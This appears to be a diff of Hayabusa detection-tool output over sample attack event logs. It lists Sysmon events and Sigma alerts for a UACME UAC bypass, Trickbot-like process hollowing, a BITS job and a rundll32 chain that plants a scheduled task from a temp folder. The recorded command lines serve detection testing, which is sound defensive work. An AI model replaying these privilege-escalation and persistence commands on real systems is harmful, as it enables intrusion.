+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
